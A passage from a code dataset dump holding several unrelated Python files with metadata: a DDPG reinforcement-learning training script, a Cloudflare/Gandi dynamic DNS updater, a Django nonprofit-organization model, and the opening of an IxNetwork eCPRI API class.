n=5):\n ep_reward_list = []\n for j in range(n):\n s = env.reset()\n ep_reward = 0\n for i in range(max_ep_len):\n # Take deterministic actions at test time (noise_scale=0)\n s, r, d, _ = env.step(self.get_action(s))\n ep_reward += r\n ep_reward_list.append(ep_reward)\n mean_ep_reward = np.mean(np.array(ep_reward_list))\n return mean_ep_reward\n\n def learn(self, batch_size=100, actor_lr_input=0.001,\n critic_lr_input=0.001,):\n if self.per_flag:\n tree_idx, batch_memory, ISWeights = self.replay_buffer.sample(batch_size=batch_size)\n batch_states, batch_actions, batch_rewards, batch_states_, batch_dones = [], [], [], [], []\n for i in range(batch_size):\n batch_states.append(batch_memory[i][0])\n batch_actions.append(batch_memory[i][1])\n batch_rewards.append(batch_memory[i][2])\n batch_states_.append(batch_memory[i][3])\n batch_dones.append(batch_memory[i][4])\n\n feed_dict = {self.x_ph: np.array(batch_states),\n self.x2_ph: np.array(batch_states_),\n self.a_ph: np.array(batch_actions),\n self.r_ph: np.array(batch_rewards),\n self.d_ph: np.array(batch_dones),\n self.actor_lr: actor_lr_input,\n self.critic_lr: critic_lr_input,\n self.ISWeights: ISWeights\n }\n q_step_ops = [self.q_loss, self.q,\n self.train_q_op,\n self.abs_errors,\n ]\n outs = self.sess.run(q_step_ops, feed_dict)\n q_loss, q, train_q_op, abs_errors = outs\n if self.learn_step % self.policy_delay == 0:\n # Delayed policy update\n outs = self.sess.run([self.pi_loss,\n self.train_pi_op,\n self.target_update],\n feed_dict)\n\n self.replay_buffer.batch_update(tree_idx,\n abs_errors) # update priority\n self.learn_step += 1\n return outs\n else:\n batch = self.replay_buffer.sample_batch(batch_size)\n feed_dict = {self.x_ph: batch['obs1'],\n self.x2_ph: batch['obs2'],\n self.a_ph: batch['acts'],\n self.r_ph: batch['rews'],\n self.d_ph: batch['done'],\n self.actor_lr: actor_lr_input,\n self.critic_lr: critic_lr_input,\n }\n q_step_ops = [self.train_q_op]\n\n # Q-learning update\n outs = self.sess.run([self.q_loss, self.q, self.train_q_op], feed_dict)\n # Policy update\n outs = self.sess.run([self.pi_loss, self.train_pi_op, self.target_update],\n feed_dict)\n\n self.learn_step += 1\n\n def load_step_network(self, saver, load_path):\n checkpoint = tf.train.get_checkpoint_state(load_path)\n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(self.sess, tf.train.latest_checkpoint(load_path))\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n self.learn_step = int(checkpoint.model_checkpoint_path.split('-')[-1])\n else:\n print(\"Could not find old network weights\")\n\n def save_step_network(self, time_step, saver, save_path):\n saver.save(self.sess, save_path + 'network', global_step=time_step,\n write_meta_graph=False)\n\n def load_simple_network(self, path):\n saver = tf.train.Saver()\n saver.restore(self.sess, tf.train.latest_checkpoint(path))\n print(\"restore model successful\")\n\n def save_simple_network(self, save_path):\n saver = tf.train.Saver()\n saver.save(self.sess, save_path=save_path + \"/params\", write_meta_graph=False)\n\n\nif __name__ == '__main__':\n import argparse\n\n random_seed = int(time.time() * 1000 % 1000)\n random_seed = 184\n parser = argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='HalfCheetah-v2')\n parser.add_argument('--hid', type=int, default=300)\n parser.add_argument('--l', type=int, default=1)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--seed', '-s', type=int, default=random_seed)\n parser.add_argument('--epochs', type=int, default=3000)\n parser.add_argument('--max_steps', type=int, default=1000)\n parser.add_argument('--exp_name', type=str, default='ddpg_per_class')\n args = parser.parse_args()\n\n env = gym.make(args.env)\n env = env.unwrapped\n env.seed(args.seed)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high[0]\n\n net = DDPG(a_dim, s_dim, a_bound,\n batch_size=100,\n sess_opt=0.1\n )\n ep_reward_list = []\n test_ep_reward_list = []\n\n for i in range(args.epochs):\n s = env.reset()\n ep_reward = 0\n st = time.time()\n for j in range(args.max_steps):\n\n # Add exploration noise\n if i < 10:\n a = np.random.rand(a_dim) * a_bound\n else:\n # a = net.choose_action(s)\n a = net.get_action(s, 0.1)\n # a = noise.add_noise(a)\n\n a = np.clip(a, -a_bound, a_bound)\n\n s_, r, done, info = env.step(a)\n done = False if j == args.max_steps - 1 else done\n\n net.store_transition((s, a, r, s_, done))\n\n s = s_\n ep_reward += r\n if j == args.max_steps - 1:\n ep_update_time = time.time()\n for _ in range(args.max_steps):\n net.learn()\n ep_update_time = time.time() - ep_update_time\n ep_reward_list.append(ep_reward)\n print('Episode:', i, ' Reward: %i' % int(ep_reward),\n # 'Explore: %.2f' % var,\n \"learn step:\", net.learn_step,\n \"ep_time:\", np.round(time.time()-st, 3),\n \"up_time:\", np.round(ep_update_time, 3),\n )\n # if ep_reward > -300:RENDER = True\n\n # 增加测试部分!\n if i % 20 == 0:\n test_ep_reward = net.test_agent(env=env, n=5)\n test_ep_reward_list.append(test_ep_reward)\n print(\"-\" * 20)\n print('Episode:', i, ' Reward: %i' % int(ep_reward),\n 'Test Reward: %i' % int(test_ep_reward),\n )\n print(\"-\" * 20)\n\n break\n\n import matplotlib.pyplot as plt\n\n plt.plot(ep_reward_list)\n img_name = str(args.exp_name + \"_\" + args.env + \"_epochs\" +\n str(args.epochs) +\n \"_seed\" + str(args.seed))\n plt.title(img_name + \"_train\")\n plt.savefig(img_name + \".png\")\n plt.show()\n plt.close()\n\n plt.plot(test_ep_reward_list)\n plt.title(img_name + \"_test\")\n plt.savefig(img_name + \".png\")\n plt.show()", "sub_path": "algos/tf1/ddpg_sp/DDPG_per_class.py", "file_name": "DDPG_per_class.py", "file_ext": "py", "file_size_in_byte": 13805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.mlp_actor_critic", "line_number": 50, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.placeholders", "line_number": 77, "usage_type": "call"}, {"api_name": "ddpg_sp.core", "line_number": 77, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 84, "usage_type": "call"}, {"api_name": "memory.sp_memory.ReplayBuffer", "line_number": 100, "usage_type": "call"}, {"api_name": "ddpg_sp.core.count_vars", "line_number": 105, "usage_type": "call"}, {"api_name": "ddpg_sp.core", "line_number": 105, "usage_type": "name"}, {"api_name": "tensorflow.stop_gradient", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 124, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 125, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.group", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.assign", "line_number": 129, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.group", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.assign", "line_number": 133, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.GPUOptions", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 148, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 230, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 230, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 243, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 244, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 248, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 248, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 257, "usage_type": "call"}, {"api_name": "gym.make", "line_number": 268, "usage_type": "call"}, {"api_name": "{'ReplayBuffer': 'memory.sp_memory.ReplayBuffer'}", "line_number": 276, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 291, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 315, "usage_type": "call"}, {"api_name": "time.time", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}]} +{"seq_id": "559986958", "text": "#!/usr/bin/env python3\n\"\"\"\n * Build By:\n * https://itheo.tech 2021\n * MIT License\n * Script to set your home (or business) IP address via cloudflare dns on A-record domain record\n * Specially used when you do not have a fixed IP address\n\"\"\"\nimport sys\nimport configparser\nimport logging\nimport logging.handlers as handlers\nimport requests\nimport threading\nfrom time import sleep\nimport concurrent.futures\nfrom concurrent.futures import ALL_COMPLETED\nimport xmlrpc\n\nimport CloudFlare\n\n\nlogger = logging.getLogger(\"ddns\")\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s\")\n\nlogHandler = handlers.TimedRotatingFileHandler(\n \"logs/normal.log\", when=\"M\", interval=1, backupCount=0\n)\nlogHandler.setLevel(logging.INFO)\nlogHandler.setFormatter(formatter)\n\nerrorLogHandler = handlers.RotatingFileHandler(\n \"logs/error.log\", maxBytes=5000, backupCount=0\n)\nerrorLogHandler.setLevel(logging.ERROR)\nerrorLogHandler.setFormatter(formatter)\n\nlogger.addHandler(logHandler)\nlogger.addHandler(errorLogHandler)\n# logger.info(\"A Sample Log Statement\")\n# logger.error(\"An error log statement\")\n\n\nclass auto_ddns:\n def __init__(self, config_in) -> None:\n self.type = config_in[\"type\"]\n self.zone_id = config_in[\"zone_id\"]\n self.api_token = config_in[\"api_token\"]\n self.ip_address_type = config_in[\"ip_address_type\"]\n self.dns_name = config_in[\"dns_name\"]\n\n logger.info(\n f\" {self.zone_id} {self.api_token } {self.ip_address_type} {self.dns_name} \"\n )\n self.current_ip = None\n self.external_ip = None\n self.cf = None\n self.new_dns_record = None\n self.dns_id = None\n\n def main(self):\n self.current_ip = self.get_ip()\n\n if not self.current_ip:\n return False\n if self.type.lower() == \"cloudflare\":\n if not self.connect_cloud_dns():\n return False\n\n if not self.get_cloud_dns():\n return False\n\n if self.external_ip is not None and self.external_ip == self.current_ip:\n return True\n\n if not self.set_cloud_dns():\n return False\n if self.type.lower() == \"gandi\":\n if not self.connect_gandi_dns():\n return False\n\n if not self.get_gandi_dns():\n return False\n\n if self.external_ip is not None and self.external_ip == self.current_ip:\n return True\n\n if not self.set_cloud_dns():\n return False\n\n return True\n\n\n\n @staticmethod\n def get_ip():\n try:\n result = requests.get(\"https://checkip.amazonaws.com\")\n if result.status_code == 200:\n print(f\"got ip\")\n return result.text.strip()\n else:\n print(\"No access to outside world\")\n return False\n except Exception as e:\n logger.error(e)\n return False\n\n def connect_gandi_dns(self):\n api = xmlrpc.ServerProxy('https://rpc.gandi.net/xmlrpc/')\n apikey=self.api_token\n r = api.catalog.list(apikey, {'product': {'type': 'domain', 'description': '.at'}})\n print(r)\n pass\n\n def get_gandi_dns(self):\n #get the dns\n set_gandi_dns()\n\n def set_gandi_dns(self):\n pass\n\n def connect_cloud_dns(self):\n try:\n self.cf = CloudFlare.CloudFlare(token=self.api_token)\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n print(\"connection to cloudlfare failed\")\n logger.error(\"API connection failed: {e}\")\n return False\n\n return True\n\n def get_cloud_dns(self):\n print(self.dns_name)\n try:\n params = {\n \"name\": self.dns_name,\n \"match\": \"all\",\n \"type\": self.ip_address_type,\n }\n logger.info(f'params {params}, {self.zone_id}, {self.dns_name}')\n dns_records = self.cf.zones.dns_records.get(self.zone_id, params=params)\n\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n logger.error(\n \"/zones/dns_records/export %s - %d %s - api call failed\"\n % (self.zone_id, e, e)\n )\n return False\n logger.info(f\"dns_records {self.dns_name} {dns_records}\")\n for dns_record in dns_records:\n try:\n self.external_ip = dns_record[\"content\"]\n\n if self.current_ip != self.external_ip:\n self.dns_id = dns_record[\"id\"] #why\n\n self.new_dns_record = {\n \"name\": self.dns_name,\n \"type\": self.ip_address_type,\n \"content\": self.current_ip,\n \"proxied\": dns_record[\"proxied\"],\n }\n else:\n logger.info(\"Getter unchanged\")\n return False\n except Exception as e:\n logger.error(e)\n return False\n logger.info(\"GETTER RAN OK\")\n return True\n\n def set_cloud_dns(self):\n try:\n logger.info(f\"self.new_dns_record {self.new_dns_record}\")\n dns_record = self.cf.zones.dns_records.post(\n self.zone_id, self.dns_id, data=self.new_dns_record\n ) # ,\n print(dns_record)\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n logger.error(\n \"/zones.dns_records.post %s - %d %s - api call failed\"\n % (self.dns_name, e, e)\n )\n return False\n\n logger.info(\n \"UPDATED: %s %s -> %s\"\n % (self.dns_name, self.external_ip, self.current_ip)\n )\n return True\n\n\ndef run_one_ddns(config):\n print(config['dns_name'])\n #logging(f'starting {config[dns_name]}')\n\n ddns = auto_ddns(config)\n\n while True:\n if ddns.main():\n sleep(300) # 15 minutes\n else:\n # I guess something went wrong, let's give the script a bit more time.\n sleep(600) # 30 minutes\n\n\nif __name__ == \"__main__\":\n configs = configparser.ConfigParser()\n configs.read(\"config.ini\")\n config_parser = [dict(configs.items(s)) for s in configs.sections()]\n print(config_parser)\n with concurrent.futures.ThreadPoolExecutor(len(config_parser)) as executor:\n fs = executor.map(run_one_ddns, config_parser)\n # x = threading.Thread(target=run_one_ddns,args=(configs[configs.sections()],range(len(configs.sections()))))\n concurrent.futures.wait(fs=fs, timeout=None, return_when=ALL_COMPLETED)\n print('Done')\n\n\n", "sub_path": "ddns.py", "file_name": "ddns.py", "file_ext": "py", "file_size_in_byte": 6782, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 28, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 37, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 100, "usage_type": "call"}, {"api_name": "xmlrpc.ServerProxy", "line_number": 112, "usage_type": "call"}, {"api_name": "CloudFlare.CloudFlare", "line_number": 127, "usage_type": "call"}, {"api_name": "CloudFlare.exceptions", "line_number": 128, "usage_type": "attribute"}, {"api_name": "CloudFlare.exceptions", "line_number": 146, "usage_type": "attribute"}, {"api_name": "CloudFlare.exceptions", "line_number": 182, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 204, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 207, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 211, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 215, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 215, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 215, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.wait", "line_number": 218, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 218, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 218, "usage_type": "name"}, {"api_name": "concurrent.futures.ALL_COMPLETED", "line_number": 218, "usage_type": "name"}]} +{"seq_id": "130431952", "text": "from django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom django_countries.fields import CountryField\nfrom autoslug.fields import AutoSlugField\n\n\norgCategories = (\n ('animal','Animal Welfare'),\n ('arts-culture','Arts and Culture'),\n ('children','Children'),\n ('civil-rights','Civil Rights'),\n ('climate-change','Climate Change'),\n ('disaster-relief','Disaster Relief'),\n ('economic-development','Economic Development'),\n ('education','Education'),\n ('environment','Environment'),\n ('health','Health'),\n ('hiv-aids','HIV-AIDS'),\n ('human-rights','Human Rights'),\n ('hunger','Hunger'),\n ('poverty','Poverty'),\n ('science-technology','Science and Technology'),\n ('social-services','Social Services'),\n ('women-girls','Women and Girls'),\n ('other','Other')\n)\n\n\nclass NonProfitOrganization(models.Model):\n name = models.CharField('Name', max_length=255)\n name_slug = AutoSlugField(populate_from='name', unique=True)\n ein = models.CharField('EIN', primary_key=True, max_length=70)\n description = models.TextField('Description', blank=True)\n mission = models.TextField('Mission', blank=True)\n address_line_1 = models.CharField('Address Line 1', max_length=200, blank=True)\n address_line_2 = models.CharField('Address Line 2', max_length=200, blank=True)\n city = models.CharField('City', max_length=50, blank=True)\n state = models.CharField('State', max_length=50, blank=True)\n zipcode = models.CharField('Zip Code', max_length=50, blank=True)\n country = CountryField(default='US')\n email = models.EmailField('Email')\n url = models.URLField('URL', default=\"\", blank=True)\n phone = models.CharField('Phone', max_length=70)\n logo = models.ImageField(upload_to='org_images/%Y/%m/%d', blank=True)\n is_faith_based = models.BooleanField('Faith Based', default=False)\n join_date = models.DateTimeField('Join Date', editable=False, null=True)\n last_update_date = models.DateTimeField('Last Update', blank=True)\n is_locked = models.BooleanField('Organization Locked', default=True)\n category = models.CharField('Category', max_length=255, choices = orgCategories)\n primary_contact = models.ForeignKey(User, verbose_name='Primary Contact', blank=True, null=True)\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n \"\"\" On save, update timestamps \"\"\"\n if not self.ein:\n self.join_date = timezone.now()\n self.last_update_date = timezone.now()\n return super(NonProfitOrganization, self).save(*args, **kwargs)\n\n def get_absolute_url(self):\n return '/organization/%s/' % self.name_slug\n\n def get_full_address(self):\n full_address = ''\n if self.address_line_1:\n full_address += self.address_line_1 + ', '\n if self.address_line_2:\n full_address += self.address_line_2 + ', '\n if self.city:\n full_address += self.city + ', '\n if self.state:\n full_address += self.state + ', '\n if self.zipcode:\n full_address += self.zipcode + ', '\n if self.country:\n full_address += str(self.country.name)\n return full_address", "sub_path": "js1kg/organization/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 3236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "autoslug.fields.AutoSlugField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django_countries.fields.CountryField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models.EmailField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 59, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 59, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "443043393", "text": "# MIT LICENSE\n#\n# Copyright 1997 - 2020 by IXIA Keysight\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nimport sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass ECpriRe(Base):\n \"\"\"EcpriRe\n The ECpriRe class encapsulates a list of eCpriRe resources that are managed by the user.\n A list of resources can be retrieved from the server using the ECpriRe.find() method.\n The list can be managed by using the ECpriRe.add() and ECpriRe.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"eCpriRe\"\n _SDM_ATT_MAP = {\n \"ActionType\": \"actionType\",\n \"Active\": \"active\",\n \"Address\": \"address\",\n \"CompensationValue\": \"compensationValue\",\n \"ConnectedVia\": \"connectedVia\",\n \"Count\": \"count\",\n \"DelayMeasurementId\": \"delayMeasurementId\",\n \"DescriptiveName\": \"descriptiveName\",\n \"DummyBytesLength\": \"dummyBytesLength\",\n \"ElementId\": \"elementId\",\n \"Errors\": \"errors\",\n \"EventId\": \"eventId\",\n \"EventSequenceNumber\": \"eventSequenceNumber\",\n \"EventType\": \"eventType\",\n \"MessageType\": \"messageType\",\n \"Multiplier\": \"multiplier\",\n \"Name\": \"name\",\n \"NumberOfFaultSubObjects\": \"numberOfFaultSubObjects\",\n \"ReadWriteType\": \"readWriteType\",\n \"RemoteResetId\": \"remoteResetId\",\n \"ReservedActionType\": \"reservedActionType\",\n \"ReservedEventType\": \"reservedEventType\",\n \"ReservedResetCode\": \"reservedResetCode\",\n \"ResetCodeOp\": \"resetCodeOp\",\n \"RmaAction\": \"rmaAction\",\n \"RmaDataLength\": \"rmaDataLength\",\n \"RtcDataLength\": \"rtcDataLength\",\n \"SequenceId\": \"sequenceId\",\n \"SessionStatus\": \"sessionStatus\",\n \"StackedLayers\": \"stackedLayers\",\n \"StartingRmaId\": \"startingRmaId\",\n \"StartingRtcId\": \"startingRtcId\",\n \"StateCounts\": \"stateCounts\",\n \"Status\": \"status\",\n \"TimeStamp\": \"timeStamp\",\n \"VendorSpecificPayloadLength\": 